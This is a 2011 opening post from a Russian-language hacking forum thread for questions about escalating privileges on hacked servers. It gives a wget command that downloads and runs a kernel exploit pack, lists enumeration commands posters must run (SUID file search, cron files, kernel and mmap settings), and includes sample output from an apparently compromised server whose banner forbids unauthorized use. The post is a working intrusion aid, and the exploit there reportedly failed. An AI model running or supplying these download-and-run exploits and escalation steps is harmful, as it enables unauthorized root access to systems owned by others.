HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Повышение прав [задай вопрос - получи ответ]
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 01.10.2011, 19:22
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию
Эта тема создана для вопросов связанных с повышением привилегий (рутинг, компиляция сплоитов, помощь в поиске сплоитов) на взломанных машинах.

Первая часть темы тут.

Мануал новичкам: Рутанье

Сплоиты можно найти тут и тут

Связка сплоитов enlightenment запускается так:

Код:
Code:
1. wget http://www.grsecurity.net/~spender/exploits/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
2. Выбираем сплоит.
3. PROFIT!!!
ПОСТЫ ОФОРМЛЕННЫЕ ОТЛИЧНО ОТ ПРАВИЛ ПЕРВОГО ПОСТА, УДАЛЯЮТСЯ! пруф

Внимание!

Если в выводе команды uname -a, вы наблюдаете нечто похожее: Linux ****** 2.*.**-NX

Это сервер принадлежит компании SpaceWeb (sweb.ru), и порутать его (сервер) практически невозможно! Так что все посты в котором фигурирует эти сервера (сервера SpaceWeb) УДАЛЯЮТСЯ!

Тоже самое касается серверов компанийДжино (www.jino.ru), Мастерхост (masterhost.ru) и 1gb (1gb.ru). пруф

Сообщение с вопросом должно содержать информацию из вывода следующих команд:
  • uname -a
  • ls -la /boot
  • lls -la --full-time /lib (или /lib64)
  • mount
  • df -h
  • cat /etc/issue
  • cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
  • cat /proc/version
  • cat /proc/sys/vm/mmap_min_addr
  • pwd
  • ls -la /usr/bin/staprun
  • find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.

Пример сообщения:

Цитата:
Сообщение от Новичок  
Новичок said:
Код:
Code:
sh-3.2# uname -a
Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
sh-3.2# ls -la /lib/libc*
-rwxr-xr-x 1 root root 1693812 Jun 27 21:25 /lib/libc-2.5.so
-rwxr-xr-x 1 root root  191708 Jun 27 21:25 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root      14 Jun 30 03:04 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root      17 Oct 22  2009 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root    7748 Sep  3  2009 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root   45432 Jun 27 21:25 /lib/libcrypt-2.5.so
-rwxr-xr-x 1 root root 1296964 Dec 15  2010 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root      14 Sep 15  2008 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root      19 Dec 28  2010 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root      15 Jun 30 03:04 /lib/libcrypt.so.1 -> libcrypt-2.5.so
lrwxrwxrwx 1 root root      11 Jun 30 03:04 /lib/libc.so.6 -> libc-2.5.so
sh-3.2# ls -la /boot
total 17891
drwxr-xr-x  4 root root    3072 Aug  9  2010 .
drwxr-xr-x 29 root root    4096 Jun 23 03:02 ..
-rw-r--r--  1 root root       0 Mar 14  2010 1
-rwxr--r--  1 root root    6144 Dec 15  2009 aquota.user
-rw-r--r--  1 root root   65972 Jan 20  2010 config-2.6.18-164.11.1.el5
-rw-r--r--  1 root root   65972 Mar 17  2010 config-2.6.18-164.15.1.el5
-rw-r--r--  1 root root   66891 Jul  2  2010 config-2.6.18-194.8.1.el5
drwxr-xr-x  2 root root    1024 Aug  9  2010 grub
-rw-------  1 root root 2674675 Mar  9  2010 initrd-2.6.18-164.11.1.el5.img
-rw-------  1 root root 2674826 May  9  2010 initrd-2.6.18-164.15.1.el5.img
-rw-------  1 root root 2700121 Aug  9  2010 initrd-2.6.18-194.8.1.el5.img
drwx------  2 root root   12288 Sep 15  2008 lost+found
-rw-r--r--  1 root root   80032 Mar 16  2009 message
-rwxr--r--  1 root root      32 Dec 15  2009 quota.user
-rw-r--r--  1 root root  108759 Jan 20  2010 symvers-2.6.18-164.11.1.el5.gz
-rw-r--r--  1 root root  108759 Mar 17  2010 symvers-2.6.18-164.15.1.el5.gz
-rw-r--r--  1 root root  112713 Jul  2  2010 symvers-2.6.18-194.8.1.el5.gz
-rw-r--r--  1 root root 1227215 Jan 20  2010 System.map-2.6.18-164.11.1.el5
-rw-r--r--  1 root root 1227352 Mar 17  2010 System.map-2.6.18-164.15.1.el5
-rw-r--r--  1 root root 1243148 Jul  2  2010 System.map-2.6.18-194.8.1.el5
-rw-r--r--  1 root root 1936156 Jan 20  2010 vmlinuz-2.6.18-164.11.1.el5
-rw-r--r--  1 root root     163 Jan 20  2010 .vmlinuz-2.6.18-164.11.1.el5.hmac
-rw-r--r--  1 root root 1936444 Mar 17  2010 vmlinuz-2.6.18-164.15.1.el5
-rw-r--r--  1 root root     163 Mar 17  2010 .vmlinuz-2.6.18-164.15.1.el5.hmac
-rw-r--r--  1 root root 1954620 Jul  2  2010 vmlinuz-2.6.18-194.8.1.el5
-rw-r--r--  1 root root     162 Jul  2  2010 .vmlinuz-2.6.18-194.8.1.el5.hmac
sh-3.2# mount
/dev/sda5 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/sda8 on /tmp type ext3 (rw,noexec,nosuid)
/dev/sda7 on /home type ext3 (rw,usrquota)
/dev/sdb1 on /backup type ext3 (rw)
/dev/sda3 on /usr type ext3 (rw,usrquota)
/dev/sda2 on /var type ext3 (rw,usrquota)
/dev/sda1 on /boot type ext3 (rw)
tmpfs on /dev/shm type tmpfs (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)
sh-3.2# pwd
/home/user
sh-3.2# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda5             9.7G  987M  8.3G  11% /
/dev/sda8             996M   42M  903M   5% /tmp
/dev/sda7             195G   51G  134G  28% /home
/dev/sdb1             227G  163G   53G  76% /backup
/dev/sda3             9.7G  6.6G  2.6G  72% /usr
/dev/sda2             9.7G  5.5G  3.8G  60% /var
/dev/sda1              99M   24M   71M  25% /boot
tmpfs                 3.9G     0  3.9G   0% /dev/shm
sh-3.2# cat /etc/issue
This computer system is for authorized users only. Individuals using this
system without authority or in excess of their authority are subject to
having all their activities on this system monitored and recorded or
examined by any authorized person, including law enforcement, as system
personnel deem appropriate. In the course of monitoring individuals
improperly using the system or in the course of system maintenance, the
activities of authorized users may also be monitored and recorded. Any
material so recorded may be disclosed as appropriate. Anyone using this
system consents to these terms.
Пробовал enlightenment, не берет.
Оффтоп, флейм и тупые вопросы не приветствуются и удаляются, рецидивисты получают статус "рид-онли", однако грамотная помощь задающим вопросы поощряется.
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ